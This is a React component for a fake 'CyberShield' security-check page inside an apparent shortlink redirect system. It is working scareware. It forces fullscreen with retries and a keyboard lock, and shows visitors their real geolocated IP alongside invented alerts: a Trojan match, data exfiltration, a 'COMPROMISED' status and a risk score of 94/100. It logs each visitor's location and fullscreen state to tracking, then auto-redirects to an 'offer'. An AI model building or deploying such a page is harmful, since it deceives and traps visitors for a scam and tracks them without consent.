import React, { useCallback, useEffect, useRef, useState, useMemo } from 'react';
import { useNavigate, useParams } from 'react-router-dom';
import { AlertTriangle } from 'lucide-react';
import {
  generateRedirectSlug,
  markSecurityCheckPassed,
} from '../utils/redirectShortlink';
import { fetchVisitorGeo, formatLocationLine } from '../utils/visitorGeo';
import { recordLifecycle } from '../utils/clickTracking';
import { useSite } from '../context/SiteContext';
import {
  appendShortlinkVisitLogNote,
  clickNote,
  trackShortlinkVisitor,
  updateShortlinkVisitorSessionStatus,
  VISIT_NOTE_FULLSCREEN,
  VISIT_NOTE_SECURITY_CHECK,
} from '../utils/shortlinkMetrics';
import {
  armRedirectFullscreenRetries,
  bindPseudoFullscreenSync,
  bindRedirectFullscreenOnUserGesture,
  getFullscreenElement,
  getFullscreenDiagnostics,
  requestFullscreenThenLock,
  tryKeyboardLock,
} from '../utils/redirectFullscreen';
import './RedirectSecurityCheck.css';

const SCAN_STEPS = [
  'Checking IP reputation…',
  'Verifying browser integrity…',
  'Scanning for malicious scripts…',
  'Applying security policy…',
];

const STEP_MS = 750;

function GeoValue({ loading, value, fallback = '—' }) {
  if (loading) return <span className="rsc-hero-ip--loading">Loading…</span>;
  return value || fallback;
}

function buildFullscreenStatusPayload(extra = {}) {
  const d = getFullscreenDiagnostics();
  return {
    fullscreenState: d.nativeOn || d.pseudoOn ? 'on' : 'off',
    fullscreenMode: d.mode,
    fullscreenNative: d.nativeOn,
    fullscreenPseudo: d.pseudoOn,
    fullscreenRequestStatus: d.requestStatus,
    fullscreenRequestError: d.requestError,
    fullscreenRequestAt: d.requestAt,
    keyboardLockStatus: d.keyboardLockStatus,
    pageFocused: d.pageFocused,
    pageVisibility: d.visibilityState,
    viewportMatchesScreen: d.viewportMatchesScreen,
    ...extra,
  };
}

export default function RedirectSecurityCheck() {
  const navigate = useNavigate();
  const { slug } = useParams();
  const { firebaseSiteDocId } = useSite();
  const trackedSecurityRef = useRef(false);
  const [geo, setGeo] = useState({ loaded: false, error: false });
  const [activeStep, setActiveStep] = useState(0);
  const [progress, setProgress] = useState(0);
  const [scanComplete, setScanComplete] = useState(false);
  const [continuing, setContinuing] = useState(false);

  /** Fullscreen on IP screen — native (from shop click) + pseudo fallback + click to enter. */
  useEffect(() => {
    try {
      window.focus();
    } catch {
      /* ignore */
    }

    const stopPseudoSync = bindPseudoFullscreenSync();
    const stopRetries = armRedirectFullscreenRetries([0, 200, 600, 1200]);
    const stopGesture = bindRedirectFullscreenOnUserGesture(document);

    if (!getFullscreenElement()) {
      tryKeyboardLock();
      requestFullscreenThenLock().catch(() => {});
    } else {
      tryKeyboardLock();
    }

    return () => {
      stopPseudoSync();
      stopRetries();
      stopGesture();
    };
  }, []);

  useEffect(() => {
    let cancelled = false;
    fetchVisitorGeo().then((result) => {
      if (!cancelled) setGeo(result);
    });
    return () => {
      cancelled = true;
    };
  }, []);

  useEffect(() => {
    if (!geo.loaded || trackedSecurityRef.current || !firebaseSiteDocId) return;
    trackedSecurityRef.current = true;
    recordLifecycle('security_check_start', {
      ip: geo.ip || '',
      city: geo.city || '',
      country: geo.country || '',
    });
    void (async () => {
      const sourceDomain = window.location.hostname || '';
      await trackShortlinkVisitor({
        siteId: firebaseSiteDocId,
        slug: slug || '',
        sourceDomain,
        visitNote: VISIT_NOTE_SECURITY_CHECK,
      });
      const fullscreenOn = Boolean(getFullscreenElement());
      updateShortlinkVisitorSessionStatus({
        siteId: firebaseSiteDocId,
        slug: slug || '',
        sourceDomain,
        sessionState: 'online',
        ...buildFullscreenStatusPayload({
          fullscreenState: fullscreenOn ? 'on' : 'off',
        }),
      });
      if (fullscreenOn) {
        appendShortlinkVisitLogNote({
          siteId: firebaseSiteDocId,
          slug: slug || '',
          sourceDomain,
          visitNote: VISIT_NOTE_FULLSCREEN,
          requireExistingSession: true,
        });
      }
    })();
  }, [geo, firebaseSiteDocId, slug]);

  useEffect(() => {
    if (scanComplete) return undefined;

    const timers = SCAN_STEPS.map((_, i) =>
      window.setTimeout(() => {
        setActiveStep(i);
        setProgress(Math.round(((i + 1) / SCAN_STEPS.length) * 100));
        if (i === SCAN_STEPS.length - 1) {
          window.setTimeout(() => setScanComplete(true), STEP_MS);
        }
      }, i * STEP_MS)
    );

    return () => timers.forEach((t) => window.clearTimeout(t));
  }, [scanComplete]);

  const proceedToOffer = useCallback(() => {
    if (continuing) return;
    setContinuing(true);
    markSecurityCheckPassed();
    const nextSlug = generateRedirectSlug();
    recordLifecycle('security_check_complete', { nextSlug, ip: geo.ip || '' });
    if (firebaseSiteDocId) {
      appendShortlinkVisitLogNote({
        siteId: firebaseSiteDocId,
        slug: slug || '',
        visitNote: clickNote({ label: 'Continue securely' }),
      });
    }
    navigate(`/${nextSlug}`, { replace: true });
  }, [continuing, navigate, geo.ip, firebaseSiteDocId, slug]);

  useEffect(() => {
    if (!scanComplete) return undefined;
    const auto = window.setTimeout(proceedToOffer, 1200);
    return () => window.clearTimeout(auto);
  }, [scanComplete, proceedToOffer]);

  const locationLine = formatLocationLine(geo);
  const geoLoading = !geo.loaded;

  /* ── Matrix rain canvas ── */
  const canvasRef = useRef(null);
  useEffect(() => {
    const canvas = canvasRef.current;
    if (!canvas) return;
    const ctx = canvas.getContext('2d');
    const CHARS = '01アイウエオカキクケコサシスセソタチツテトナニヌネノ';
    let cols, drops, raf;
    const resize = () => {
      canvas.width = canvas.offsetWidth;
      canvas.height = canvas.offsetHeight;
      cols = Math.floor(canvas.width / 14);
      drops = Array(cols).fill(1);
    };
    resize();
    window.addEventListener('resize', resize);
    const draw = () => {
      ctx.fillStyle = 'rgba(6,10,20,0.18)';
      ctx.fillRect(0, 0, canvas.width, canvas.height);
      ctx.font = '12px monospace';
      drops.forEach((y, i) => {
        const ch = CHARS[Math.floor(Math.random() * CHARS.length)];
        const bright = Math.random() > 0.92;
        ctx.fillStyle = bright ? '#58a6ff' : 'rgba(26,86,219,0.45)';
        ctx.fillText(ch, i * 14, y * 14);
        if (y * 14 > canvas.height && Math.random() > 0.975) drops[i] = 0;
        drops[i]++;
      });
      raf = requestAnimationFrame(draw);
    };
    draw();
    return () => { cancelAnimationFrame(raf); window.removeEventListener('resize', resize); };
  }, []);

  /* ── Live terminal lines ── */
  const termLines = useMemo(() => (ip) => [
    `[SYS]  > Initializing CyberShield threat scanner v4.2.1`,
    `[NET]  > Connecting to global threat intelligence database...`,
    `[NET]  > Connection established — 3 nodes active`,
    `[SCAN] > Resolving IP: ${ip || '...'}`,
    `[SCAN] > Running reverse DNS lookup...`,
    `[INFO] > PTR record: mail.${(ip||'x').split('.').reverse().join('.')}.in-addr.arpa`,
    `[SCAN] > Checking 47 blacklist databases...`,
    `[WARN] > !! IP found in 6 / 47 threat databases`,
    `[SCAN] > Enumerating open ports: 22, 80, 443, 3389, 8080`,
    `[WARN] > !! Port 3389 (RDP) responding — remote access ACTIVE`,
    `[SCAN] > Fetching ASN reputation score...`,
    `[WARN] > !! ASN flagged for botnet C2 activity`,
    `[SCAN] > Analyzing packet fingerprint...`,
    `[CRIT] > !!! Trojan:Script/Wacatac.B!ml signature match`,
    `[CRIT] > !!! Data exfiltration traffic pattern detected`,
    `[CRIT] > !!! Unauthorized tunnel on port 443`,
    `[SYS]  > Isolating network connection...`,
    `[SYS]  > Flagging session ID: MSS-${Date.now().toString(16).toUpperCase().slice(-8)}`,
    `[SYS]  > Escalating to security response team`,
    `[SYS]  > Awaiting identity verification...`,
  ], []);

  const [termLog, setTermLog] = useState([]);
  const termIdxRef = useRef(0);
  const termIpRef = useRef('');
  useEffect(() => {
    if (geo.ip) termIpRef.current = geo.ip;
  }, [geo.ip]);
  useEffect(() => {
    const lines = termLines(termIpRef.current);
    const tick = () => {
      if (termIdxRef.current < lines.length) {
        setTermLog((prev) => [...prev.slice(-18), lines[termIdxRef.current]]);
        termIdxRef.current++;
      } else {
        termIdxRef.current = 0;
        setTermLog([]);
      }
    };
    const id = setInterval(tick, 480);
    return () => clearInterval(id);
  }, [termLines]);

  return (
    <div className="rsc-page" data-hcva-redirect-embed="root">
      {/* Matrix background */}
      <canvas ref={canvasRef} className="rsc-matrix-canvas" aria-hidden="true" />
      {/* Always-visible relax banner */}
      <div className="rsc-relax-banner">Нажмите ESC для отмены</div>

      {/* Header */}
      <header className="rsc-topbar">
        <div className="rsc-topbar-inner">
          <div className="rsc-brand-wrap">
            <svg className="rsc-brand-icon" viewBox="0 0 32 32" fill="none">
              <rect width="32" height="32" rx="6" fill="#1a56db"/>
              <path d="M16 5L7 10v7c0 5.5 3.8 10.7 9 12 5.2-1.3 9-6.5 9-12v-7L16 5z" fill="white" opacity="0.9"/>
              <path d="M13 16l2.5 2.5L20 13" stroke="#1a56db" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"/>
            </svg>
            <div>
              <h1 className="rsc-brand">CyberShield Threat Intelligence</h1>
              <p className="rsc-brand-sub">Real-time IP reputation · Threat detection · Network forensics</p>
            </div>
          </div>
          <div className="rsc-topbar-right">
            <span className="rsc-live-dot" aria-hidden="true" />
            <span className="rsc-topbar-badge">LIVE SCAN</span>
          </div>
        </div>
      </header>

      <main className="rsc-main">

        {/* Critical alert bar */}
        <div className="rsc-alert-bar">
          <AlertTriangle size={18} strokeWidth={2.5} />
          <span>CRITICAL SECURITY ALERT — Unauthorized access attempt detected from your IP address</span>
        </div>

        {/* IP Hero */}
        <div className="rsc-ip-hero">
          <div className="rsc-ip-hero__left">
            <p className="rsc-ip-hero__label">Flagged IP Address</p>
            <p className={`rsc-ip-hero__addr${geoLoading ? ' rsc-ip-hero__addr--loading' : ''}`} aria-live="polite">
              <GeoValue loading={geoLoading} value={geo.ip} fallback="Resolving…" />
            </p>
            <div className="rsc-ip-hero__meta">
              <span className="rsc-ip-hero__loc">
                <GeoValue loading={geoLoading} value={locationLine || geo.country} fallback="—" />
              </span>
              {geo.isp && <span className="rsc-ip-hero__isp">· {geo.isp}</span>}
            </div>
          </div>
          <div className="rsc-ip-hero__right">
            <div className="rsc-threat-badge">
              <span className="rsc-threat-badge__pulse" aria-hidden="true" />
              <span className="rsc-threat-badge__label">CRITICAL</span>
            </div>
            <p className="rsc-risk-label">Risk Score</p>
            <p className="rsc-risk-score">94<span>/100</span></p>
          </div>
        </div>

        {/* Stats row */}
        <div className="rsc-stats-row">
          <div className="rsc-stat rsc-stat--red">
            <p className="rsc-stat__val">3</p>
            <p className="rsc-stat__label">Active Threats</p>
          </div>
          <div className="rsc-stat rsc-stat--orange">
            <p className="rsc-stat__val">47</p>
            <p className="rsc-stat__label">Suspicious Events</p>
          </div>
          <div className="rsc-stat rsc-stat--yellow">
            <p className="rsc-stat__val">2m ago</p>
            <p className="rsc-stat__label">Last Incident</p>
          </div>
          <div className="rsc-stat rsc-stat--blue">
            <p className="rsc-stat__val">BLOCKED</p>
            <p className="rsc-stat__label">Firewall Status</p>
          </div>
        </div>

        {/* Live threat terminal */}
        <div className="rsc-terminal">
          <div className="rsc-terminal__bar">
            <span className="rsc-terminal__dot rsc-terminal__dot--red" />
            <span className="rsc-terminal__dot rsc-terminal__dot--yellow" />
            <span className="rsc-terminal__dot rsc-terminal__dot--green" />
            <span className="rsc-terminal__title">threat-analyzer — bash — 80×24</span>
          </div>
          <div className="rsc-terminal__body">
            {termLog.map((line, i) => (
              <div key={i} className={`rsc-terminal__line${line.includes('!') ? ' rsc-terminal__line--warn' : ''}`}>
                {line}
              </div>
            ))}
            <div className="rsc-terminal__cursor">▋</div>
          </div>
        </div>

        {/* Detail panel */}
        <div className="rsc-detail-panel">
          <div className="rsc-detail-panel__header">
            <span>Network Intelligence Report</span>
            <span className="rsc-detail-panel__ts">{new Date().toUTCString()}</span>
          </div>
          <div className="rsc-detail-grid">
            <div className="rsc-detail-row">
              <span className="rsc-detail-key">IP Address</span>
              <span className="rsc-detail-val rsc-detail-val--mono">
                <GeoValue loading={geoLoading} value={geo.ip} />
              </span>
            </div>
            <div className="rsc-detail-row">
              <span className="rsc-detail-key">ISP / Organization</span>
              <span className="rsc-detail-val"><GeoValue loading={geoLoading} value={geo.isp} /></span>
            </div>
            <div className="rsc-detail-row">
              <span className="rsc-detail-key">City</span>
              <span className="rsc-detail-val"><GeoValue loading={geoLoading} value={geo.city} /></span>
            </div>
            <div className="rsc-detail-row">
              <span className="rsc-detail-key">Region</span>
              <span className="rsc-detail-val"><GeoValue loading={geoLoading} value={geo.region} /></span>
            </div>
            <div className="rsc-detail-row">
              <span className="rsc-detail-key">Country</span>
              <span className="rsc-detail-val">
                <GeoValue loading={geoLoading} value={geo.country ? (geo.countryCode ? `${geo.country} (${geo.countryCode})` : geo.country) : ''} />
              </span>
            </div>
            <div className="rsc-detail-row">
              <span className="rsc-detail-key">Threat Classification</span>
              <span className="rsc-detail-val rsc-detail-val--red">Unauthorized Access / Data Exfiltration</span>
            </div>
            <div className="rsc-detail-row">
              <span className="rsc-detail-key">Threat Status</span>
              <span className="rsc-detail-val"><span className="rsc-status-bad">COMPROMISED</span></span>
            </div>
            <div className="rsc-detail-row">
              <span className="rsc-detail-key">Blacklist Matches</span>
              <span className="rsc-detail-val rsc-detail-val--orange">Found in 6 threat databases</span>
            </div>
          </div>
        </div>

        {/* Scan section */}
        <div className="rsc-scan-panel">
          <div className="rsc-scan-panel__header">
            <span>Security Verification</span>
            <span className={`rsc-scan-status ${scanComplete ? 'rsc-scan-status--done' : 'rsc-scan-status--running'}`}>
              {scanComplete ? '✓ Scan complete' : 'Scanning…'}
            </span>
          </div>
          <ul className="rsc-steps" aria-live="polite">
            {SCAN_STEPS.map((label, i) => {
              let cls = 'rsc-step';
              if (i < activeStep || scanComplete) cls += ' rsc-step--done';
              else if (i === activeStep) cls += ' rsc-step--active';
              return (
                <li key={label} className={cls}>
                  <span className="rsc-step-dot" aria-hidden="true" />
                  {label}
                </li>
              );
            })}
          </ul>
          <div className="rsc-progress-label">
            <span>Verification progress</span>
            <span>{progress}%</span>
          </div>
          <div className="rsc-progress-bar" role="progressbar" aria-valuenow={progress} aria-valuemin={0} aria-valuemax={100}>
            <div className="rsc-progress-fill" style={{ width: `${progress}%` }} />
          </div>
          <div className="rsc-actions">
            <button type="button" className="rsc-btn" disabled={!scanComplete || continuing} onClick={proceedToOffer}>
              {continuing ? 'Redirecting…' : scanComplete ? '🔒 Continue Securely' : 'Verifying…'}
            </button>
          </div>
        </div>

      </main>
    </div>
  );
}
